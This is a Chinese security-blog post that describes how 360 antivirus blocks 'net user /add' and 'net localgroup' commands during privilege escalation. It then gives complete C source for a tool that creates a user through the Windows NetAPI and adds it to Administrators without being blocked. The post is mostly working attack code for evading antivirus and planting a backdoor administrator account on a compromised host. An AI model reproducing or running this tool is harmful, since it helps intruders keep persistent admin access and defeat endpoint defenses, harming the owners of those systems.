360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xxx/add.360会拦截,如图: net user 和 net1 user 都被拦截了,改名执行也拦截,想想这功能也不能这么鸡肋。当然360还会拦截其他命令,这次只对net user xxx xx /add做讨论。于是索性自己用C写一个吧,果断被360无视了,如图: 源码: //Code by Pnig0s1992 //Date:2012,3,17 #include <stdio.h> #include <Windows.h> #include <lm.h> #pragma comment(lib,"Netapi32.lib") int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName); int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName); BOOL ImprovePriv(LPWSTR name); int main(INT argc,char * argv[]) { BOOL bResult = ImprovePriv(SE_MACHINE_ACCOUNT_NAME); if(argc < 3) { printf("\nCode by Pnig0s1992"); printf("\nUsage:"); printf("\n\t%s UserName Password",argv[0]); printf("\n\tRemark:Default add to Group:Administrators."); return -1; } if(bResult) { printf("Successfully promote priv!"); }else { printf("Failed promote priv."); return -1; } int Namesize=MultiByteToWideChar(CP_ACP,0,argv[1],-1,NULL,0); wchar_t *wUserName =new wchar_t[Namesize+1]; if(!MultiByteToWideChar(CP_ACP,0,argv[1],-1,wUserName,Namesize)) { return false; } int Passsize=MultiByteToWideChar(CP_ACP,0,argv[2],-1,NULL,0); wchar_t *wPassword =new wchar_t[Passsize+1]; if(!MultiByteToWideChar(CP_ACP,0,argv[2],-1,wPassword,Passsize)) { return false; } LPTSTR lpName = wUserName; LPTSTR lpPassword = wPassword; LPWSTR lpSevName = NULL; LPWSTR lpGroupName = L"Administrators"; AddUser(lpName,lpPassword,lpSevName); SetGroup(lpName,lpSevName,lpGroupName); return 0; } BOOL ImprovePriv(LPWSTR name) { HANDLE hToken; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)) { printf("\nGet process token failed.(%d)",GetLastError()); return FALSE; } TOKEN_PRIVILEGES tkp; tkp.PrivilegeCount = 1; if(!LookupPrivilegeValue(NULL,name,&tkp.Privileges[0].Luid)) { printf("\nLookup process priv failed.(%d)",GetLastError()); return FALSE; } tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken,FALSE,&tkp,0,NULL,NULL)) { printf("\nAjust process priv failed.(%d)",GetLastError()); return FALSE; } CloseHandle(hToken); return TRUE; } int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName) { USER_INFO_1 ui; DWORD dwLevel = 1; DWORD dwError = 0; NET_API_STATUS nStatus; ui.usri1_name = lpUsername; ui.usri1_password = lpPassword; ui.usri1_priv = USER_PRIV_USER; ui.usri1_home_dir = NULL; ui.usri1_comment = NULL; ui.usri1_flags = UF_SCRIPT; ui.usri1_script_path = NULL; nStatus = NetUserAdd(lpServerName,dwLevel,(LPBYTE)&ui,&dwError); if(nStatus == NERR_Success) { printf("\nAdd user:%S successfully!",lpUsername); }else { printf("\nAdd user failed:%d.",nStatus); } return 0; } int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName) { NET_API_STATUS nStatus; LOCALGROUP_MEMBERS_INFO_3 lgui; lgui.lgrmi3_domainandname = lpUsername; nStatus = NetLocalGroupAddMembers(lpServerName,lpGroupName,3,(LPBYTE)&lgui,1); if(nStatus == NERR_Success) { printf("\nSuccessfully set USER:%S to GROUP:%S!",lpUsername,lpGroupName); }else if(nStatus == NERR_GroupNotFound) { printf("\nCan't find such a group:%S.",lpGroupName); }else { printf("\nSet GROUP:%S failed.",lpGroupName); } return 0; }